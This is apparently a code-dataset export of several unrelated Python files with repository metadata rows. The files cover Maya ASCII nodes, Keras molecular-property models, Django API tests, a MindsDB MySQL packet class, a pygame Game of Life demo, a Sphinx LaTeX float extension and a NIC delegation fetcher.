plug = self._plugs.get(attribute.shortName, None)
if plug is not None:
yield plug
else:
continue
def dagPath(self):
"""
Returns a dag path for this node.
:rtype: str
"""
if self.parent is not None:
return '|'.join([x.absoluteName() for x in self.trace()])
else:
return self.name
def attribute(self, name):
"""
Returns an ascii attribute with the given name.
:type name: str
:rtype: asciiattribute.AsciiAttribute
"""
return self.listAttr(fromPlugin=True, userDefined=True).get(name, None)
def listAttr(self, fromPlugin=False, userDefined=False):
"""
Returns a list of attributes derived from this node.
:type fromPlugin: bool
:type userDefined: bool
:rtype: hashtable.HashTable
"""
# Check if plugin defined attributes should be returned
#
attributes = hashtable.HashTable()
if fromPlugin:
attributes.update(self.__class__.__attributes__[self.type])
# Check if user defined attributes should be returned
#
if userDefined:
attributes.update(self._attributes)
return attributes
def addAttr(self, *args, **kwargs):
"""
Adds a dynamic attribute to this node.
This function accepts two different sets of arguments.
You can either supply a fully formed AsciiAttribute.
Or you can pass all of the keywords required to create one.
:rtype: None
"""
# Check number of arguments
#
numArgs = len(args)
numKwargs = len(kwargs)
if numArgs == 1:
# Store reference to attribute
#
attribute = args[0]
self._attributes[attribute.shortName] = attribute
self._attributes[attribute.longName] = attribute
elif numKwargs > 0:
# Create new attribute from kwargs
#
attribute = asciiattribute.AsciiAttribute(**kwargs)
self.addAttr(attribute)
else:
raise TypeError(f'addAttr() expects 1 argument ({numArgs} given)!')
def setAttr(self, plug, value):
"""
Assigns the supplied value to the given plug.
:type plug: Union[str, asciiplug.AsciiPlug]
:type value: Any
:rtype: None
"""
# Check plug type
#
if isinstance(plug, str):
plug = self.findPlug(plug)
# Assign value to plug
#
plug.setValue(value)
def connectAttr(self, source, destination):
"""
Connects the two supplied plugs together.
:type source: Union[str, asciiplug.AsciiPlug]
:type destination: Union[str, asciiplug.AsciiPlug]
:rtype: None
"""
# Check source type
#
if isinstance(source, str):
source = self.findPlug(source)
# Check destination type
#
if isinstance(destination, str):
destination = self.findPlug(destination)
# Connect plugs
#
source.connect(destination)
def findPlugs(self, path):
"""
Returns a list of plugs from the supplied string path.
:type path: str
:rtype: list[asciiplug.AsciiPlug]
"""
return asciiplug.AsciiPlugPath(f'{self.absoluteName()}.{path}', scene=self.scene).evaluate()
def findPlug(self, path):
"""
Returns the plug associated with the given name.
If more than one plug is found then a type error is raised.
:type path: str
:rtype: asciiplug.AsciiPlug
"""
plugs = self.findPlugs(path)
numPlugs = len(plugs)
if numPlugs == 0:
return None
elif numPlugs == 1:
return plugs[0]
else:
raise TypeError('findPlug() multiple plugs found!')
def legalConnection(self, plug, otherPlug):
"""
Evaluates whether or not the connection between these two plugs is valid.
TODO: Implement this behaviour!
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: bool
"""
return True
def connectionMade(self, plug, otherPlug):
"""
Callback method for any connection changes made to this node.
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: None
"""
self._connections.append(otherPlug.weakReference())
def legalDisconnection(self, plug, otherPlug):
"""
Evaluates whether or not the disconnection between these two plugs is valid.
TODO: Implement this behaviour!
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: bool
"""
return True
def connectionBroken(self, plug, otherPlug):
"""
Callback method for any disconnection changes made to this node.
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: None
"""
self._connections.remove(otherPlug.weakReference())
def getCreateNodeCmd(self):
"""
Returns a command string that can create this node.
:rtype: str
"""
# Check if node has parent
#
if self.parent is not None:
return f'createNode {self.type} -s -n "{self.absoluteName()}" -p "{self.parent.absoluteName()}";'
else:
return f'createNode {self.type} -s -n "{self.absoluteName()}";'
def getSelectCmd(self):
"""
Returns a command string that can select this node.
:rtype: str
"""
return f'select -ne "{self.absoluteName()}";'
def getRenameCmd(self):
"""
Returns a command string that can rename this node's UUID.
:rtype: str
"""
return f'\trename -uid "{self.uuid}";'
def getLockNodeCmd(self):
"""
Returns a command string that can lock this node.
:rtype: str
"""
return f'\tlockNode -l {int(self.isLocked)};'
def getAddAttrCmds(self):
"""
Returns a list of commands for user-defined attributes.
:rtype: list[str]
"""
return [x.getAddAttrCmd() for x in self.listAttr(userDefined=True).values()]
def getSetAttrCmds(self):
"""
Returns a list of commands for non-default plugs.
:rtype: list[str]
"""
# Iterate through top-level plugs
#
commands = []
for plug in self.iterTopLevelPlugs():
commands.extend(plug.getSetAttrCmds())
return commands
def getConnectAttrCmds(self):
"""
Returns a list of command strings that can recreate the outgoing connections from this node.
:rtype: list[str]
"""
# Iterate through known connections
#
numCommands = len(self._connections)
commands = [None] * numCommands
for (i, ref) in enumerate(self._connections):
# Check if ref is still alive
#
otherPlug = ref()
if otherPlug is None:
continue
# Concatenate source name
#
plug = otherPlug.source()
source = plug.partialName(includeNodeName=True, useFullAttributePath=True, includeIndices=True)
# Check if destination index matters
#
if otherPlug.isElement and not otherPlug.attribute.indexMatters:
destination = otherPlug.parent.partialName(includeNodeName=True, useFullAttributePath=True, includeIndices=True)
commands[i] = f'connectAttr "{source}" "{destination}" -na;'
else:
destination = otherPlug.partialName(includeNodeName=True, useFullAttributePath=True, includeIndices=True)
commands[i] = f'connectAttr "{source}" "{destination}";'
return commands
| 23.997628
| 128
| 0.571824
| 2,025
| 20,230
| 5.651852
| 0.172346
| 0.016776
| 0.016339
| 0.017475
| 0.276365
| 0.235736
| 0.171953
| 0.130712
| 0.123547
| 0.112014
| 0
| 0.000598
| 0.338952
| 20,230
| 842
| 129
| 24.026128
| 0.855231
| 0.310677
| 0
| 0.166667
| 0
| 0.003704
| 0.075687
| 0.03189
| 0
| 0
| 0
| 0.002375
| 0
| 1
| 0.177778
| false
| 0
| 0.014815
| 0
| 0.32963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b47fa6cab25d27a526a824846c9378728893e8
| 5,195
|
py
|
Python
|
predicting_molecular_properties/nn_utils.py
|
ashesh-0/kaggle_competitions
|
58e927971b6ee67583a76a5ac821430a8d0bc31a
|
[
"MIT"
] | 1
|
2019-11-20T11:33:51.000Z
|
2019-11-20T11:33:51.000Z
|
predicting_molecular_properties/nn_utils.py
|
ashesh-0/kaggle_competitions
|
58e927971b6ee67583a76a5ac821430a8d0bc31a
|
[
"MIT"
] | null | null | null |
predicting_molecular_properties/nn_utils.py
|
ashesh-0/kaggle_competitions
|
58e927971b6ee67583a76a5ac821430a8d0bc31a
|
[
"MIT"
] | null | null | null |
"""
Utility functions for Neural network
"""
import pandas as pd
from keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
from sklearn.preprocessing import StandardScaler
from keras.layers import Dense, BatchNormalization, Input, LeakyReLU, Dropout
from keras.models import Model, load_model
from keras.optimizers import Adam
def plot_history(history, label, loss_str='sc_outp_mean_absolute_error'):
import matplotlib.pyplot as plt
plt.plot(history.history[loss_str])
plt.plot(history.history[f'val_{loss_str}'])
plt.title(f'Loss for {label}')
plt.ylabel('Loss')
plt.xlabel('Epoch')
_ = plt.legend(['Train', 'Validation'], loc='upper left')
plt.show()
def create_nn_model(input_shape):
inp = Input(shape=(input_shape, ))
x = Dense(256)(inp)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
# x = Dense(1024)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
# x = Dropout(0.2)(x)
# x = Dense(1024)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
# x = Dropout(0.2)(x)
x = Dense(512)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
# x = Dense(512)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
# x = Dropout(0.4)(x)
x = Dense(256)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
out1 = Dense(20, activation="linear", name='int_outp')(x) #2 mulliken charge, tensor 6, tensor 12(others)
x = Dense(128)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
# x = Dense(128)(x)
# x = BatchNormalization()(x)
# x = LeakyReLU(alpha=0.05)(x)
x = Dense(64)(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Dropout(0.2)(x)
out = Dense(1, activation="linear", name='sc_outp')(x) #scalar_coupling_constant
model = Model(inputs=inp, outputs=[out, out1])
# model = Model(inputs=inp, outputs=[out])
return model
def train_nn(nn_config, train_X, train_Y, val_X, val_Y, test_X):
model_name_wrt = f'molecule_model_{nn_config["type_enc"]}.hdf5'
assert isinstance(nn_config['load_model'], bool)
if nn_config['load_model'] is False:
model = create_nn_model(train_X.shape[1])
model.compile(loss='mse', metrics=['mae'], optimizer=Adam(lr=nn_config['lr']))
# tensorboard_callback = TensorBoard("logs/" + datetime.now().strftime('%H:%M:%S'), update_freq='epoch')
val_loss = 'val_sc_outp_mean_absolute_error'
es = EarlyStopping(monitor=val_loss, mode='min', patience=30, verbose=0)
rlr = ReduceLROnPlateau(monitor=val_loss, factor=0.1, patience=25, min_lr=1e-6, mode='auto', verbose=1)
sv_mod = ModelCheckpoint(
model_name_wrt, monitor='val_sc_outp_mean_absolute_error', save_best_only=True, period=1)
train_Y = train_Y.values
val_Y = val_Y.values
history = model.fit(
train_X, [train_Y[:, 0], train_Y[:, 1:]],
validation_data=(val_X, [val_Y[:, 0], val_Y[:, 1:]]),
epochs=nn_config['epochs'],
verbose=0,
batch_size=nn_config['batch_size'],
callbacks=[es, rlr, sv_mod])
plot_history(history, nn_config['type_enc'])
else:
print('Loading from file', model_name_wrt)
model = load_model(model_name_wrt)
output_dict = {
'model': model,
'train_prediction': model.predict(train_X)[0][:, 0],
'val_prediction': model.predict(val_X)[0][:, 0],
'test_prediction': model.predict(test_X)[0][:, 0],
}
return output_dict
def get_intermediate_Ydf(mulliken_df, magnetic_shielding_tensors_df, raw_train_df):
interm_Y_atomdata_df = pd.merge(
mulliken_df, magnetic_shielding_tensors_df, how='outer', on=['molecule_name', 'atom_index'])
Y_cols = interm_Y_atomdata_df.columns.tolist()
Y_cols.remove('molecule_name')
Y_cols.remove('atom_index')
interm_Y_df = raw_train_df[['molecule_name', 'atom_index_0', 'atom_index_1']].reset_index()
interm_Y_df = pd.merge(
interm_Y_df,
interm_Y_atomdata_df,
how='left',
left_on=['molecule_name', 'atom_index_0'],
right_on=['molecule_name', 'atom_index'])
interm_Y_df.rename({c: f'{c}_0' for c in Y_cols}, axis=1, inplace=True)
interm_Y_df.drop('atom_index', axis=1, inplace=True)
interm_Y_df = pd.merge(
interm_Y_df,
interm_Y_atomdata_df,
how='left',
left_on=['molecule_name', 'atom_index_1'],
right_on=['molecule_name', 'atom_index'])
interm_Y_df.rename({c: f'{c}_1' for c in Y_cols}, axis=1, inplace=True)
interm_Y_df.drop(['atom_index', 'atom_index_0', 'atom_index_1', 'molecule_name'], axis=1, inplace=True)
interm_Y_df.set_index('id', inplace=True)
# Normalization
interm_Y_df = pd.DataFrame(
StandardScaler().fit_transform(interm_Y_df), columns=interm_Y_df.columns, index=interm_Y_df.index)
return interm_Y_df
| 35.101351
| 112
| 0.638499
| 751
| 5,195
| 4.165113
| 0.250333
| 0.02046
| 0.043159
| 0.060422
| 0.384591
| 0.3539
| 0.282928
| 0.269821
| 0.269821
| 0.269821
| 0
| 0.028258
| 0.209817
| 5,195
| 147
| 113
| 35.340136
| 0.733739
| 0.133013
| 0
| 0.252525
| 0
| 0
| 0.136252
| 0.029484
| 0
| 0
| 0
| 0
| 0.010101
| 1
| 0.040404
| false
| 0
| 0.070707
| 0
| 0.141414
| 0.010101
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b6d3e8c3f61f05d6fffeaf8b3486a12424b3e5
| 2,809
|
py
|
Python
|
fn_portal/tests/api/test_fn026.py
|
AdamCottrill/FishNetPortal
|
4e58e05f52346ac1ab46698a03d4229c74828406
|
[
"MIT"
] | null | null | null |
fn_portal/tests/api/test_fn026.py
|
AdamCottrill/FishNetPortal
|
4e58e05f52346ac1ab46698a03d4229c74828406
|
[
"MIT"
] | null | null | null |
fn_portal/tests/api/test_fn026.py
|
AdamCottrill/FishNetPortal
|
4e58e05f52346ac1ab46698a03d4229c74828406
|
[
"MIT"
] | null | null | null |
"""=============================================================
~/fn_portal/fn_portal/tests/api/test_FN026.py
Created: 26 May 2021 18:01:30
DESCRIPTION:
This file contains a number of unit tests that verify that the api
endpoint for FN026 objects works as expected:
+ the fn026 list returns all of the spaces
associated with a specific project
+ the space detail endpoint will return the space code, space
description, dd_lat, dd_lon.
=============================================================
"""
import json
import pytest
from django.urls import reverse
from fn_portal.models import FN026
from fn_portal.tests.fixtures import api_client, project
from rest_framework import status
from ..factories import FN026Factory
@pytest.mark.django_db
def test_fn026_list(api_client, project):
""""""
prj_cd = project.prj_cd
url = reverse("fn_portal_api:fn026-list", kwargs={"prj_cd": prj_cd})
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
data = [
(x.get("space"), x.get("space_des"), x.get("dd_lat"), x.get("dd_lon"))
for x in response.data["results"]
]
assert len(data) == 2
expected = [("S1", "Space 1", 45.1, -81.1), ("S2", "Space 2", 45.2, -81.2)]
assert data == expected
@pytest.mark.django_db
def test_fn026_detail(api_client, project):
""""""
prj_cd = project.prj_cd
space = "S1"
expected = {
"space": "S1",
"space_des": "Space 1",
"dd_lat": 45.1,
"dd_lon": -81.1,
}
FN026Factory(project=project, **expected)
url = reverse(
"fn_portal_api:fn026-detail", kwargs={"prj_cd": prj_cd, "space": space}
)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
for k, v in expected.items():
assert response.data[k] == expected[k]
expected_fields = {
"project",
"label",
"space",
"space_des",
"area_lst",
"grdep_ge",
"grdep_lt",
"sidep_lt",
"sidep_ge",
"grid_ge",
"grid_lt",
"site_lst",
"sitp_lst",
"dd_lat",
"dd_lon",
}
assert set(response.data.keys()) == expected_fields
args = [
("LHA_IA19_FOO", "S1"), # bad project code, good space
("LHA_IA19_000", "99"), # good project code, bad space
]
@pytest.mark.django_db
@pytest.mark.parametrize("prj_cd,space", args)
def test_fn026_detail_404(api_client, project, prj_cd, space):
"""If we ask for space or project that does exist we should get back a
404.
"""
url = reverse(
"fn_portal_api:fn026-detail", kwargs={"prj_cd": prj_cd, "space": space}
)
response = api_client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
| 24.215517
| 79
| 0.603062
| 380
| 2,809
| 4.255263
| 0.323684
| 0.037106
| 0.037106
| 0.033395
| 0.300557
| 0.277675
| 0.261596
| 0.22449
| 0.183673
| 0.183673
| 0
| 0.045643
| 0.227839
| 2,809
| 115
| 80
| 24.426087
| 0.699862
| 0.229975
| 0
| 0.205882
| 0
| 0
| 0.159774
| 0.035714
| 0
| 0
| 0
| 0
| 0.102941
| 1
| 0.044118
| false
| 0
| 0.102941
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b86bc1dbc7088b4836cb91a3edc65c0a97f48c
| 5,182
|
py
|
Python
|
mindsdb/proxies/mysql/data_types/mysql_packet.py
|
aykuttasil/mindsdb
|
2c36b6f75f13d7104fe4d3dbb7ca307fa84f45ad
|
[
"MIT"
] | 1
|
2022-03-14T00:32:53.000Z
|
2022-03-14T00:32:53.000Z
|
mindsdb/proxies/mysql/data_types/mysql_packet.py
|
aykuttasil/mindsdb
|
2c36b6f75f13d7104fe4d3dbb7ca307fa84f45ad
|
[
"MIT"
] | null | null | null |
mindsdb/proxies/mysql/data_types/mysql_packet.py
|
aykuttasil/mindsdb
|
2c36b6f75f13d7104fe4d3dbb7ca307fa84f45ad
|
[
"MIT"
] | null | null | null |
"""
*******************************************************
* Copyright (C) 2017 MindsDB Inc. <copyright@mindsdb.com>
*
* This file is part of MindsDB Server.
*
* MindsDB Server can not be copied and/or distributed without the express
* permission of MindsDB Inc
*******************************************************
"""
import struct
import pprint
# import logging
from libs.helpers.logging import logging
from libs.constants.mysql import MAX_PACKET_SIZE
class Packet:
def __init__(self, length=0, seq=0, body='', packet_string = None, socket = None, session = None, proxy = None, parent_packet=None, **kwargs):
if parent_packet is None:
self.mysql_socket = socket
self.session = session
self.proxy = proxy
else:
self.mysql_socket = parent_packet.mysql_socket
self.session = parent_packet.session
self.proxy = parent_packet.proxy
self._kwargs = kwargs
self.setup()
if packet_string is not None:
self.loadFromPacketString(packet_string)
else:
self.loadFromParams(length, seq, body)
def setup(self, length=0, seq=0, body=None):
self.loadFromParams(length=length, seq=seq, body=body)
def loadFromParams(self, length, seq, body):
self._length = length
self._seq = seq
self._body = body
def setBody(self, body_string):
self._body = body_string
self._length = len(body_string)
def loadFromPacketString(self, packet_string):
len_header = struct.unpack('>i', struct.pack('1s', '') + packet_string[:3])[0]
count_header = struct.unpack('b', packet_string[3])[0]
body = packet_string[4:]
self.loadFromParams(length=len_header, seq=count_header, body=body)
def getPacketString(self):
body = self.body
len_header = struct.pack('<i', self.length)[:3] # keep it 3 bytes
count_header = struct.pack('b', self.seq)
packet = len_header + count_header + body
return packet
def get(self):
# packet_string = self._socket.request.recv(4)
# if len(packet_string)<4:
# val = 'Expecting packet, but header len is <0'
# logging.error(val)
# raise ValueError(val)
len_header = MAX_PACKET_SIZE
body = b''
count_header = 1
while len_header == MAX_PACKET_SIZE:
packet_string = self.mysql_socket.request.recv(4)
if len(packet_string) < 4:
logging.warning('Packet with less than 4 bytes in length')
return False
break
len_header = struct.unpack('i', packet_string[:3] + b'\x00')[0]
if len_header == 0:
break
count_header = int(packet_string[3])
body += self.mysql_socket.request.recv(len_header)
self.session.logging.debug('Got packet')
self.session.logging.debug(body)
self.session.count = int(count_header) + 1
self.setup(len(body), count_header, body)
return True
def send(self):
self._seq = self.proxy.count
string = self.getPacketString()
self.session.logging.debug('Sending packet string')
self.session.logging.debug(string)
self.mysql_socket.request.sendall(string)
self.proxy.count += 1
def pprintPacket(self,body = None):
if body is None:
body = self.body
print(str(self))
for i,x in enumerate(body):
part = '[BODY]'
print('''{part}{i}:{h} ({inte}:{actual})'''.format(part=part, i=i+1, h=hex(ord(x)), inte=ord(x), actual=str(x)))
def isEOF(self):
if self.length == 0:
return True
else:
return False
@property
def length(self):
#self._length = len(self.body)
return self._length
@property
def seq(self):
return self._seq
@property
def body(self):
return self._body
@staticmethod
def bodyStringToPackets(body_string):
"""
The method takes a string and turns it into mysql_packets
:param body_string: text to turn into mysql_packets
:return: a list of mysql_packets
"""
ret = []
body_len = len(body_string)
mod = body_len % MAX_PACKET_SIZE
num_packets = body_len / MAX_PACKET_SIZE + (1 if mod > 0 else 0)
for i in range(num_packets):
left_limit = i * MAX_PACKET_SIZE
right_limit = mod if i + 1 == num_packets else MAX_PACKET_SIZE * (i + 1)
body = body_string[left_limit:right_limit]
ret += [Packet(length=right_limit, seq=i+1, body=body)]
return ret
def __str__(self):
return str({'body': self.body, 'length': self.length, 'seq': self.seq})
def test():
import pprint
u = Packet()
#u.setBody('test')
pprint.pprint(Packet.bodyStringToPackets('abdds')[0].getPacketString())
#pprint.pprint(u.getPacketString())
# only run the test if this file is called from debugger
if __name__ == "__main__":
test()
| 28.31694
| 147
| 0.588383
| 641
| 5,182
| 4.594384
| 0.218409
| 0.057046
| 0.0309
| 0.031239
| 0.104244
| 0.037351
| 0.024448
| 0.024448
| 0.024448
| 0
| 0
| 0.010785
| 0.284253
| 5,182
| 182
| 148
| 28.472527
| 0.78323
| 0.154767
| 0
| 0.148148
| 0
| 0
| 0.033804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.148148
| false
| 0
| 0.046296
| 0.037037
| 0.296296
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34b987e6c437ee88219466fd33845cf6a6a27b4b
| 2,538
|
py
|
Python
|
py/example/gol.py
|
zefaxet/libant
|
1be1865404eea729f8512e9ccd73899fbd5b7cb2
|
[
"MIT"
] | 4
|
2019-10-18T06:14:36.000Z
|
2020-06-01T14:28:57.000Z
|
py/example/gol.py
|
zefaxet/libant
|
1be1865404eea729f8512e9ccd73899fbd5b7cb2
|
[
"MIT"
] | null | null | null |
py/example/gol.py
|
zefaxet/libant
|
1be1865404eea729f8512e9ccd73899fbd5b7cb2
|
[
"MIT"
] | null | null | null |
import pygame
from random import randint
from time import sleep
import data
SCREEN_SIZE = 700
STAGE_SIZE = 175 # 175 is largest size without bezels for 700 x 700 window
sizeof_rect = int(SCREEN_SIZE / STAGE_SIZE)
bezel = int((SCREEN_SIZE - (STAGE_SIZE * sizeof_rect)) / 2)
def draw_bordered_square(x, y, filled, size):
pygame.draw.rect(screen, (0, 0, 0), (x, y, size, size)), filled
if not filled:
pygame.draw.rect(screen, (255, 255, 255), (x + 1, y + 1, size - 2, size - 2))
def grid_to_screen(x, y):
return x * sizeof_rect + bezel, y * sizeof_rect + bezel
def screen_to_grid(x, y):
return int((x - bezel) / sizeof_rect), int((y - bezel) / sizeof_rect)
def flip_cell(x, y):
cells[x][y] = not cells[x][y]
draw_bordered_square(*grid_to_screen(x, y), cells[x][y], sizeof_rect)
def draw_cells():
for x in range(bezel, STAGE_SIZE * sizeof_rect + bezel, sizeof_rect):
for y in range(bezel, STAGE_SIZE * sizeof_rect + bezel, sizeof_rect):
coord = screen_to_grid(x, y)
draw_bordered_square(x, y, cells[coord[0]][coord[1]], sizeof_rect)
directions = []
for x in [-1, 0, 1]:
for y in [-1, 0, 1]:
directions.append((x, y))
directions.remove((0,0))
def get_neighbours(x, y):
total = 0
for d in directions:
try:
if cells[(x + d[0]) % STAGE_SIZE][(y + d[1]) % STAGE_SIZE]:
total += 1
except:
print(x, y, d, (x + d[0]) % SCREEN_SIZE, (y + d[1]) % SCREEN_SIZE)
raise IndexError
return total
pygame.display.set_mode((SCREEN_SIZE, SCREEN_SIZE))
pygame.display.set_caption("Game of Life Classic Demo")
pygame.init()
screen = pygame.display.get_surface()
cells = data.grid
pause = True
round = 0
while True:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:
pause = not pause
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = pygame.mouse.get_pos()
x = int(x / int(SCREEN_SIZE / STAGE_SIZE))
y = int(y / int(SCREEN_SIZE / STAGE_SIZE))
flip_cell(x, y)
print(x, y)
if event.type == pygame.QUIT:
exit(0)
if not pause and round < 50:
new_cells = []
for x in range(STAGE_SIZE):
new_row = []
for y in range(STAGE_SIZE):
neighbours = get_neighbours(x, y)
cell = cells[x][y]
if cell:
if neighbours < 2 or neighbours > 3:
cell = 0
elif neighbours == 3:
cell = 1
new_row.append(cell)
new_cells.append(new_row)
cells = new_cells
draw_cells()
round += 1
pygame.display.flip()
| 25.897959
| 80
| 0.636722
| 410
| 2,538
| 3.787805
| 0.219512
| 0.024469
| 0.033484
| 0.046362
| 0.216999
| 0.05924
| 0.05924
| 0.05924
| 0.05924
| 0.05924
| 0
| 0.029622
| 0.228526
| 2,538
| 97
| 81
| 26.164948
| 0.763534
| 0.021671
| 0
| 0
| 0
| 0
| 0.010487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0
| 0.052632
| 0.026316
| 0.171053
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34ba56f92389624b3e0ca24dcce3ebbffc885fcd
| 3,494
|
py
|
Python
|
latexnewfloat.py
|
takaakiaoki/sphinx_latexnewfloat
|
e20c4b6825484976cf41c48a634b67524024007f
|
[
"BSD-2-Clause"
] | null | null | null |
latexnewfloat.py
|
takaakiaoki/sphinx_latexnewfloat
|
e20c4b6825484976cf41c48a634b67524024007f
|
[
"BSD-2-Clause"
] | null | null | null |
latexnewfloat.py
|
takaakiaoki/sphinx_latexnewfloat
|
e20c4b6825484976cf41c48a634b67524024007f
|
[
"BSD-2-Clause"
] | null | null | null |
r""" latexnewfloat.py extension for latex builder to replace
literal-block environment by \captionof{LiteralBlockNewFloat}{caption_title} command.
For \captionof command (in capt-of pacakge), the new environment
LiteralBlockNewFloat should be configured by newfloat pagage instead of
original float package.
needspace package is required, and \literalblockneedspace and \literalblockcaptionaboveskip
are introduced in order to control pagebreak around caption.
Usage:
add following latex preambles for latex_elements['preamble'] in conf.py
'preamble': r'''
% declare new LiteralBlockNewFloat. You may change `name` option
\DeclareFloatingEnvironment{LiteralBlockNewFloat}
% confiure additional options
\SetupFloatingEnvironment{LiteralBlockNewFloat}{name=Listing,placement=h,fileext=loc}
% change within option in similar to literal-block in sphinx.sty
\ifx\thechapter\undefined
\SetupFloatingEnvironment{LiteralBlockNewFloat}{within=section}
\else
\SetupFloatingEnvironment{LiteralBlockNewFloat}{within=chapter}
\fi
% if the left page space is less than \literalblockneedsapce, insert page-break
\newcommand{\literalblockneedspace}{5\baselineskip}
% margin before the caption of literal-block
\newcommand{\literalblockcaptionaboveskip}{0.5\baselineskip}
'''
Run sphinx with builder name 'latexnewfloat'
python -m sphinx.__init__ -b latexnewfloat {intpudir} {outputdir}
or
- add entry in makefile
- you may also override original latex builder entry using app.set_translator
"""
from sphinx.writers.latex import LaTeXTranslator
from sphinx.builders.latex import LaTeXBuilder
def setup(app):
app.add_builder(LaTeXNewFloatBuilder)
app.set_translator('latexnewfloat', LaTeXNewFloatTranslator)
# uncomment if you want to override stadnard latex builder
# app.set_translator('latex', LaTeXNewFloatTranslator)
app.add_latex_package('newfloat')
app.add_latex_package('capt-of')
app.add_latex_package('needspace')
return {'version': '0.3'}
# inherited from LaTeXBuilder
class LaTeXNewFloatBuilder(LaTeXBuilder):
name = 'latexnewfloat'
# inherited from LaTeXTranslator
class LaTeXNewFloatTranslator(LaTeXTranslator):
def __init__(self, document, builder):
LaTeXTranslator.__init__(self, document, builder)
# flag whether caption is under container[litelal_block=True] node
self.in_container_literal_block = 0
def visit_caption(self, node):
self.in_caption += 1
if self.in_container_literal_block:
self.body.append('\\needspace{\\literalblockneedspace}')
self.body.append('\\vspace{\\literalblockcaptionaboveskip}')
self.body.append('\\captionof{LiteralBlockNewFloat}{')
else:
self.body.append('\\caption{')
def visit_container(self, node):
if node.get('literal_block'):
self.in_container_literal_block += 1
ids = ''
for id in self.next_literal_ids:
ids += self.hypertarget(id, anchor=False)
if node['ids']:
ids += self.hypertarget(node['ids'][0])
self.next_literal_ids.clear()
self.body.append('\n')
self.context.append(ids + '\n')
def depart_container(self, node):
if node.get('literal_block'):
self.in_container_literal_block -= 1
self.body.append(self.context.pop())
| 40.627907
| 92
| 0.709788
| 383
| 3,494
| 6.35248
| 0.4047
| 0.04439
| 0.034525
| 0.036169
| 0.076449
| 0.054254
| 0.054254
| 0.054254
| 0.054254
| 0.054254
| 0
| 0.003571
| 0.198626
| 3,494
| 85
| 93
| 41.105882
| 0.865357
| 0.522038
| 0
| 0.051282
| 0
| 0
| 0.130277
| 0.066345
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128205
| false
| 0
| 0.051282
| 0
| 0.282051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34baa570e639a04a3c0bb24a77d73f14fd9abb0d
| 9,347
|
py
|
Python
|
django_g11n/tools/ipranges.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tools/ipranges.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tools/ipranges.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Module to fetch and parse regional NIC delegation data
"""
import urllib.parse
import ftplib
import os
from functools import lru_cache
import socket
import ipaddress
from binascii import hexlify
import tempfile
TWD = tempfile.gettempdir()
DELEGATES = [
# America (non-latin)
"ftp://ftp.arin.net/pub/stats/arin/delegated-arin-extended-latest",
# Europe
